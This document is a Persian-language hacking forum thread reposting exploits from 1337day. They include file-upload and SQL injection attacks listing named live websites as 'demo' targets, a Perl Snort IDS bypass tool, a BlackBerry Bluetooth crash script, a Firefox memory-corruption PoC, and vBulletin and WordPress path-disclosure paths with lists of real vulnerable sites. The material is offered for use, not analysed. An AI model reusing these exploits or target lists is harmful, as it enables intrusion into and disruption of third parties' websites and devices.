انجمن تیم امنیتی ایران سایبر

Private Exploits In 1337day

شروع موضوع توسط WH!T3 W01F ‏28/1/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Digitale Age File Upload / Sql injection vulnerabilites

    Digitale Age File Upload / Sql injection vulnerabilites

    PHP:
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm The Black Devils member from Inj3ct0r Team         1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    # Exploit Title: Digitale Age File Upload vulnerability
    # Date: 
    # Author: The Black Devils
    # Home: 1337day Exploit DataBase 1337day.com
    # Vendor : http://www.digitalage.fr/
    # Category : [ webapps ]
    # Dork:Fabriqué par: Safe & Web Company (((( Digital Age ))))
    # Type : php
    # Tested on: [Windows] & [Ubuntu]
     
     
     
    http://Localost/admin/plugin/file_li...itle=1&bText=0
     
    thn upload your shell using tamber data then you'll find it in these directory 
     
    http://localhost/photo/galerie/0/Cyber.php
     
     
     
    Demo
    http://www.assurances-guillaume.com/admin/
    http://www.millionpereetfils.com/admin
    http://www.vert-eco-materiaux.com/admin
    http://www.la-hyene-jeans.com/admin/
    http://www.dba-demenagement-41.com/admin
    http://www.dp-toiture.com/admin
     
     
    Sql injection
     
    # Dork:inurl:mdm-popup.php?id=
    # Type : php
    # Tested on: [Windows] & [Ubuntu]
     
     
    http://Localhost/mdm-popup.php?id= [sql Injection]
     
    Demo
    http://www.assurances-guillaume.com/mdm-popup.php?id=6'
    http://www.millionpereetfils.com/mdm-popup.php?id=2'
    http://www.vert-eco-materiaux.com/mdm-popup.php?id=2'
    http://www.la-hyene-jeans.com/mdm-popup.php?id=2'
    http://www.dba-demenagement-41.com/mdm-popup.php?id=2'
    http://www.dp-toiture.com/mdm-popup.php?id=5'
     
     
    #------------------
    Greet's To:r0073r & sH3LL05Dz & Dz-CombatanT & all Inj3ctor Team & Arab47.com & is-sec.org Members & 
    Newbie3viLc063s & All The Algerian Hackerz
    #------------------
    Contact:
    https://www.f*ac*ebook.com/DevilsDz
    https://www.f*ac*ebook.com/necesarios
    #------------------
     
    # A666F63EB92782BC   1337day.com [2014-06-15]   D06408D46EE5F331 #
     
  2. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

    Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

    PHP:
    #!/usr/bin/perl 
    use IO::Socket
      
    # By Xianur0 
    [email protected] 
    # http://loscaballeros.mx/ 
    # Snort Multiple HTTP Bypass 
      
    my $bypasscount=0
    die(
    "Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n"unless($ARGV[0]); 
    if(-
    f $ARGV[0] || -d $ARGV[0]){ 
    print 
    "[-] Analyzing Rules...\n\n"
    checkrules($ARGV[0]); 
    } else { 
    tests(); 

      
    sub hdump 
    my $offset 0
    my(@array,$format); 
    foreach 
    my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) { 
    my($len)=length($data); 
    if (
    $len == 16) { 
    @array = 
    unpack('N4'$data); 
    $format="0x%08x (%05d)   %08x %08x %08x %08x   %s\n"
    } else { 
    @array = 
    unpack('C*'$data); 
    $_ sprintf "%2.2x"$_ for @array; 
    push(@array, '  ') while $len++ < 16
    $format="0x%08x (%05d)" 
    "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n"
    }  
    $data =~ tr/\0-\37\177-\377/./; 
    printf $format,$offset,$offset,@array,$data
    $offset += 16


      
    sub snorthexdecode
    my $encoded=$_[0]; 
    while(
    $encoded =~ /\|((\s*([\d\w]{2})\s*)+)\|/) { 
    $cadena="\\|".$1."\\|"
    $remplazo=""
    my @caracteres=($cadena =~ /([\d\w]{2})/g); 
    foreach 
    $caracter (@caracteres) { 
    $remplazo.=chr(hex($caracter)); 

    $encoded=~s/$cadena/$remplazo/g

    return 
    $encoded

    sub analizerules 
    my $pathrules=$_[0]; 
    if(-
    f $pathrules){ 
    open RULE,$pathrules
    while(<
    RULE>) { 
    my $rule=$_
    $rule=~s/[\r\n]+$//g; 
    if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){ 
    if(snorthexdecode($1)=~/([^"
    ]*\.\w{1,4})(\|3F\||\?)([^"]+)/){ 
    my 
    $bypass=$1."?junk&".$3; 
    print "
    [!] Vuln rule ".$pathrules."".$rule."\n[!] URI Bypass".$bypass."\n\n"; 
    $bypasscount++; 

    } elsif(
    $rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){ 
    if(
    snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){ 
    my $bypass=$1."\t".$2
    print 
    "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n"
    $bypasscount++; 



    elsif(-d $pathrules) { 
    opendir (DIR$pathrules); 
    while(
    readdir DIR) { 
    analizerules($pathrules."/".$_) if($_ !~/^\.+$/); 



    sub checkrules 
    my $checkpath=$_[0]; 
    analizerules($checkpath); 
    print 
    "[-] Bypassed rules: ".$bypasscount."\n"

    sub tests 
    my $host=""
    my $port=80
    my $path=""
    if(
    $ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){ 
    $host=$1
    $path=$2
    if(
    $host=~/^([^\:]+)\:(\d+)$/){ 
    $host=$1
    $port=$2


    if(
    $host!~/^[^\:]+$/){ 
    die(
    'Invalid URL!'); 

    print 
    "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n"
    if(
    $path !~ "/(.+)"){ 
    die(
    'I need a path...'); 
    $path=$1

    $encodedpath=$path
    $encodedpath=~s/([^\/])/"%" uc(sprintf("%2.2x",ord($1)))/eg
    print 
    "[-] Encoded path: ".$encodedpath."\n"
    @
    orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th"); 
    my $payload="POST / HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: ".$host.("\r\n"x12). 
    "POST / HTTP/1.1\r\n"
    "Host: ".$host."\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30".("\r\n"x12). 
    "1234567890"
      
    @
    packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n",""); 
    $packets[1]=$payload.$packets[0]; 
      
    $i=0
    foreach 
    $packet (@packets){ 
    my $sock = new IO::Socket::INET 
    PeerAddr => $host
    PeerPort => $port
    Proto => 'tcp'
    Reuse => 1
    ); 
    die 
    "Could not create socket: $!\n" unless $sock
    print 
    "[-] Seding ".$orders[$i]." test...\n"
    hdump($packet); 
    print 
    $sock $packet
    print 
    "\n[+] Headers:\n"
    my $todo=""
    while(<
    $sock>){ 
    $todo.=$_

    close($sock); 
    hdump($todo); 
    $i++; 

    }  
      
    # 1337day.com [2012-12-12]
     
  3. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Blackberry OBEX PUSH Crash (Bluetooth) PoC

    PHP:
    #!/usr/bin/python 
     
     
    #Blackberry Bluetooth Crash (OBEX PUSH) 
    # By Xianur0 
    [email protected] 
    # First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel]) 
    # By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc... 
    # ATTENTION: The channel of obex push can vary from blackberry to blackberry 
     
     
    import binascii 
    import serial 
      
    filetosend
    ="/home/xianur0/image.jpg" 
    ****tosend="crashingyou.jpg" 
     
     
    def file
    ****d(string): 
    hexstring "00" 
    for x in string
    hexstring += hex(ord(x))[2:]+"00" 
    return hexstring 
      
    def bin2dec
    (hexstring): 
    hexval "" 
    for a in hexstring
    aux hex(ord(a))[2:] 
    if 
    len(aux) < 2
    aux "0"+aux 
    hexval 
    += aux 
    return int(hexval16
     
     
    def dec2hex
    (dec,largo): 
    retorno hex(dec)[2:] 
    if (
    len(retorno)/2)*!= len(retorno): 
    retorno "0"+retorno 
    if(len(retorno)/largo): 
    for 
    i in range(largo-(len(retorno)/2)): 
    retorno "00"+retorno 
    return retorno 
      
    def enviar
    (filepath,file****): 
    serialrf None 
    print "Loading..." 
    try: 
    serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0 
    except
    return 

    print "Ok!" 
    file**** = file****d(file****) 
    filebinary "" 
    filehandler open(filepath,'rb'
    for 
    linea in filehandler.readlines(): 
    filebinary += linea 
    lengthfile 
    len(filebinary
    print 
    "File Size:",lengthfile 
    sizefragment 
    38 
    while True
    try: 
    print 
    "Sending bytes..." 
    serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos 
    print "Reading..." 
    status serialrf.read(1
    print 
    hex(ord(status)) 
    if 
    hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10"
    resto serialrf.read(2
    largo bin2dec(resto)-
    if largo 0
    resto serialrf.read(largo
    else: 
    return 

    header 
    "01"+dec2hex((len(file****)/2)+4,2) + file**** + "00c3" dec2hex(len(filebinary),4
    lengthheader = (len(file****)/2)+12 
    fragmento 
    filebinary[0:sizefragment
    envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2)) 
    envio += fragmento 
    serialrf
    .write(envio
    except
    return 

    serialrf
    .close() 
    return 

      
      
    enviar
    (filetosend,****tosend 
      
    # 1337day.com [2012-12-12]
     
  4. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Mozilla FireFox 17.0.1 Memory Corruption PoC

    Mozilla FireFox 17.0.1 Memory Corruption PoC

    PHP:
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    0     _                   __           __       __                     1 
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0 
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
    1                  \ \____/ >> Exploit database separated by exploit   0 
    0                   \/___/          type (local, remote, DoS, etc.)    1 
    1                                                                      1 
    0  [+] Site            : 1337day.com                                   0 
    1  [+] Support e-mail  : submit[at]1337day.com                         1 
    0                                                                      0 
    1               #########################################              1 
    0               I'm KedAns-Dz member from Inj3ct0r Team                1 
    1               #########################################              0 
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
      
    ### 
    # Title : Mozilla FireFox 17.0 Memory Corruption p0c 
    # Author : KedAns-Dz 
    # E-mail : ked-h (@hotmail.com / @1337day.com) 
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) 
    # *** Site : www.1337day.com .net .org 
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d 
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com 
    # Platform/CatID : local - 0day 
    # Type : Local Exploit - proof of concept 
    # Tested on : Linux SUSE - Enterprise v.11 
    # Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2] 
    ### 
      
    # <3 <3 Greetings t0 Palestine <3 <3 
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting 
      
    --> 
      
    <html> 
    <head> 
    <title>Memory Corruption bY KedAns-Dz</title> 
    <**** onload="**********:KedAns();"> 
    <script ********="**********"> 
    function KedAns() 

      
    // (puf) it's just for make a buffer and Crash ! 
    // some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes 
    var puf =unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
      
    ********.write(puf); // Buffer1 
      
    var buffer = '\x41\x42\x43' // ABC buffer 
    for(i=0; i <= 999 ; ++i) 

    buffer+=buffer+buffer 
    ********.write(buffer); // Corrupt this !!! 
      

      
    // [ Memory Corruption !! (*__^) ] 
      
    }  
    </script> 
    </head> 
    </****> 
    </html> 
    <!-- 
      
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== 
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem 
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, 
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) 
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection 
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all 
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD 
    # packetstormsecurity.org * ****sploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits ***s 
    #============================================================================================================ -->  
      
    # 1337day.com [2012-12-12]
     
  5. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    vBulletin 4.2.0 Full Path Disclosure Vulnerability

    PHP:
    The Full Path Disclosure is vBulletin 4.2.0in forumrunnerWith Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's user****.  
      
    To see it go to

     
     
    http
    ://[path]/forumrunner/include/album.php 
     
     
    It works in 90
    of the forums
     
     
      
    Example

    http://www.mgcproducts.com/forumrunner/include/album.php 
    http://atheistdiscussion.com/forumrunner/include/album.php 
    http://apolyton.net/forumrunner/include/album.php 
    http://www.romaniancommunity.net/forumrunner/include/album.php 
    http://www.ghosthax.com/forumrunner/include/album.php 
    http://www.reddotcity.net/forumrunner/include/album.php 
    http://www.sevenskins.com/forum/forumrunner/include/album.php 
    http://www.purevb.com/forumrunner/include/album.php 
    http://forum.hackersbrasil.com.br/forumrunner/include/album.php  
     
     
    # 1337day.com [2012-12-12]
     
  6. R3DM0V3
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏26/12/14
    ارسال ها:
    81
    تشکر شده:
    21
    Blackberry OBEX PUSH Crash (Bluetooth) PoC
    PHP:
    //...Leaked bY beBoss..//  
    //......12.12.2012.....// 

    #!/usr/bin/python 
      
    #Blackberry Bluetooth Crash (OBEX PUSH) 
    # By Xianur0 
    [email protected] 
    # First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel]) 
    # By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc... 
    # ATTENTION: The channel of obex push can vary from blackberry to blackberry 
      
    import binascii 
    import serial 
      
    filetosend
    ="/home/xianur0/image.jpg" 
    ****tosend="crashingyou.jpg" 
      
    def file****d(string): 
    hexstring "00" 
    for x in string
    hexstring += hex(ord(x))[2:]+"00" 
    return hexstring 
      
    def bin2dec
    (hexstring): 
    hexval "" 
    for a in hexstring
    aux hex(ord(a))[2:] 
    if 
    len(aux) < 2
    aux "0"+aux 
    hexval 
    += aux 
    return int(hexval16
      
    def dec2hex(dec,largo): 
    retorno hex(dec)[2:] 
    if (
    len(retorno)/2)*!= len(retorno): 
    retorno "0"+retorno 
    if(len(retorno)/largo): 
    for 
    i in range(largo-(len(retorno)/2)): 
    retorno "00"+retorno 
    return retorno 
      
    def enviar
    (filepath,file****): 
    serialrf None 
    print "Loading..." 
    try: 
    serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0 
    except
    return 

    print "Ok!" 
    file**** = file****d(file****) 
    filebinary "" 
    filehandler open(filepath,'rb'
    for 
    linea in filehandler.readlines(): 
    filebinary += linea 
    lengthfile 
    len(filebinary
    print 
    "File Size:",lengthfile 
    sizefragment 
    38 
    while True
    try: 
    print 
    "Sending bytes..." 
    serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos 
    print "Reading..." 
    status serialrf.read(1
    print 
    hex(ord(status)) 
    if 
    hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10"
    resto serialrf.read(2
    largo bin2dec(resto)-
    if largo 0
    resto serialrf.read(largo
    else: 
    return 

    header 
    "01"+dec2hex((len(file****)/2)+4,2) + file**** + "00c3" dec2hex(len(filebinary),4
    lengthheader = (len(file****)/2)+12 
    fragmento 
    filebinary[0:sizefragment
    envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2)) 
    envio += fragmento 
    serialrf
    .write(envio
    except
    return 

    serialrf
    .close() 
    return 
     
  7. R3DM0V3
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏26/12/14
    ارسال ها:
    81
    تشکر شده:
    21
    Joomla all v1.5 Error Based SQL Injection Vulnerability
    PHP:
    //...Leaked bY beBoss..//  
    //......12.12.2012.....// 

    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    0     _                   __           __       __                     1 
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
    1                  \ \____/ >> Exploit database separated by exploit   0 
    0                   \/___/          type (local, remote, DoS, etc.)    1 
    1                                                                      1 
    0  [+] Site            : 1337day.com                                   0 
    1  [+] Support e-mail  : submit[at]1337day.com                         1 
    0                                                                      0 
    1               #########################################              1 
    0               I'm Caddy-dz member from Inj3ct0r Team                 1 
    1               #########################################              0 
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
      
    #### 
    # Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability 
    # Author: Caddy-Dz 
    # f*ac*ebook Page: https://www.f*ac*ebook.com/Algerian.Cyber.Army 
    # E-mail: [email protected]  
    # Category:: ***apps 
    # script home : http://joomla.com 
    # Dork : inurl:option=com_user 
    # Security Risk: critical 
    # Tested on: Back|Track 5 KDE / French 
    #### 
    # this was written for educational purpose only. use it at your own risk. 
    # author will be not responsible for any damage caused! user assumes all responsibility  
    # intended for authorized *** application pentesting only! 
      
    // Description : 
      
    the affected component is /com_user/ in all joomla v1.5 
    P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-) 
      
    // Exploit : 
      
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection) 
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character] 
     
  8. R3DM0V3
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏26/12/14
    ارسال ها:
    81
    تشکر شده:
    21
    Verified Paypal Email Script
    PHP:
    <?php 
    // email address to check 
    $verifyEmail '[email protected]'

    // your paypal credentials 
    $loginEmail ''
    $password ''

    if (!
    isLogin($loginEmail$password)) { 
    echo 
    'Login failed'
    } else if (
    isVerified($verifyEmail)) { 
    echo 
    'Verified'
    } else { 
    echo 
    'Not verified'



    ######################################### 
    function isVerified($verifyEmail) { 
    $url 'https://www.paypal.com/us/verified/pal='.$verifyEmail
    $response curl_get($url); 
    if(
    strpos($response'<td class="emphasis">Verified</td>')) { 
    return 
    true
    } else { 
    return 
    false



    function 
    isLogin($email$password) { 
    // Get login page  
    $response curl_get('https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run'); 
    $postFields getHiddenFormInputs($response'login_form'); 
    if (!
    $postFields) { 
    return 
    false

    // Post login 
    $postFields['login_email'] = $email
    $postFields['login_password'] = $password
    $postFields serializePostFields($postFields); 
    $response curl_get('https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit'$postFields); 
    if(!
    strpos($response'login_cmd=_login-done')) { 
    return 
    false
    } else { 
    return 
    true



    function 
    curl_get($url$postfields=false) { 
    static 
    $curl
    if(empty(
    $curl)) { 
    $cookiejar 'curl_cookiejar.txt'
    @
    unlink($cookiejar); 
    $curl curl_init(); 
    curl_setopt($curlCURLOPT_COOKIEJAR$cookiejar); 
    curl_setopt($curlCURLOPT_COOKIEFILE$cookiejar); 
    curl_setopt($curlCURLOPT_USERAGENT$_SERVER['HTTP_USER_AGENT']); 
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); 
    curl_setopt($curlCURLOPT_HEADER1); 
    curl_setopt($curlCURLOPT_MAXREDIRS5); 
    curl_setopt($curlCURLOPT_FOLLOWLOCATION1); 

    curl_setopt($curlCURLOPT_URL$url); 
    if(
    stripos($url'https')!==false) { 
    curl_setopt($curlCURLOPT_SSL_VERIFYPEER0); 
    curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);  

    if (
    $postfields) { 
    curl_setopt($curlCURLOPT_POST1);     
    curl_setopt($curlCURLOPT_POSTFIELDS$postfields); 

    $response curl_exec($curl); 
    return 
    $response


    function 
    getHiddenFormInputs($html) { 
    if(!
    preg_match('|<form[^>]+login_form[^>]+>.*</form>|Usi'$html$form)) { 
    return 
    ''

    if(!
    preg_match_all('/<input[^>]+hidden[^>]*>/i'$form[0], $inputs)) { 
    return 
    ''

    $hiddenInputs = array(); 
    foreach(
    $inputs[0] as $input){ 
    if (
    preg_match('|name\s*=\s*[\'"]([^\'"]+)[\'"]|i'$input$name)) { 
    $hiddenInputs[$name[1]] = ''
    if (
    preg_match('|value\s*=\s*[\'"]([^\'"]*)[\'"]|i'$input$value)) { 
    $hiddenInputs[$name[1]] = $value[1]; 



    return 
    $hiddenInputs


    function 
    serializePostFields($postFields) { 
    foreach(
    $postFields as $key => $value) { 
    $value urlencode($value); 
    $postFields[$key] = "$key=$value"

    $postFields implode($postFields'&'); 
    return 
    $postFields



    ?>
     
  9. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Blackberry OBEX PUSH Crash (Bluetooth) PoC

    اين رو من در يكم بالاتر گذاشته بودم لطفا در گذاشتن اكسپلويت ها دقت كنيد كه در قبل گذاشته نشده باشند.

    موفق باشيد
     
  10. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Wordpress 3.4.2 Full Path Disclosure Vulnerability

    Wordpress 3.4.2 Full Path Disclosure Vulnerability

    PHP:
    The Full Path Disclosure is in Wordpress <= 3.4.2with this information you can get the path to the site you're in and (in most of the cases) cpanel's user****. 
      
    To see it go to
      
    http://[path]/wp-includes/rss-functions.php 
      
      
    Examples
    http://tsmp.us/wp-includes/rss-functions.php 
    http://tafeio.com/wp-includes/rss-functions.php 
    http://santana1540.com.br/wp-includes/rss-functions.php 
      
    It works in 90of the ***sites  
      
    # 1337day.com [2012-12-12]
     
  11. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

    vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

    PHP:
    /includes/api/commonwhitelist_2.php 
    /includes/api/commonwhitelist_5.php 
    /includes/api/commonwhitelist_6.php 
    /includes/api/1/album_album.php 
    /includes/api/1/album_editalbum.php 
    /includes/api/1/album_latest.php 
    /includes/api/1/album_overview.php 
    /includes/api/1/album_picture.php 
    /includes/api/1/album_user.php 
    /includes/api/1/announcement_edit.php 
    /includes/api/1/announcement_view.php 
    /includes/api/1/api_cmscategorylist.php 
    /includes/api/1/api_cmssectionlist.php 
    /includes/api/1/api_forumlist.php 
    /includes/api/1/api_getnewtop.php 
    /includes/api/1/api_getsecuritytoken.php 
    /includes/api/1/api_getsessionhash.php 
    /includes/api/1/api_init.php 
    /includes/api/1/api_mobilepublisher.php 
    /includes/api/1/api_usersearch.php 
    /includes/api/1/blog_blog.php 
    /includes/api/1/blog_bloglist.php 
    /includes/api/1/blog_comments.php 
    /includes/api/1/blog_custompage.php 
    /includes/api/1/blog_dosendtofriend.php 
    /includes/api/1/blog_list.php 
    /includes/api/1/blog_members.php 
    /includes/api/1/blog_post_comment.php 
    /includes/api/1/blog_post_editblog.php 
    /includes/api/1/blog_post_editcomment.php 
    /includes/api/1/blog_post_edittrackback.php 
    /includes/api/1/blog_post_newblog.php 
    /includes/api/1/blog_post_postcomment.php 
    /includes/api/1/blog_post_updateblog.php 
    /includes/api/1/blog_sendtofriend.php 
    /includes/api/1/blog_subscription_entrylist.php 
    /includes/api/1/blog_subscription_userlist.php 
    /includes/api/1/blog_usercp_addcat.php 
    /includes/api/1/blog_usercp_editcat.php 
    /includes/api/1/blog_usercp_editoptions.php 
    /includes/api/1/blog_usercp_editprofile.php 
    /includes/api/1/blog_usercp_modifycat.php 
    /includes/api/1/blog_usercp_updateprofile.php 
    /includes/api/1/editpost_editpost.php 
    /includes/api/1/editpost_updatepost.php 
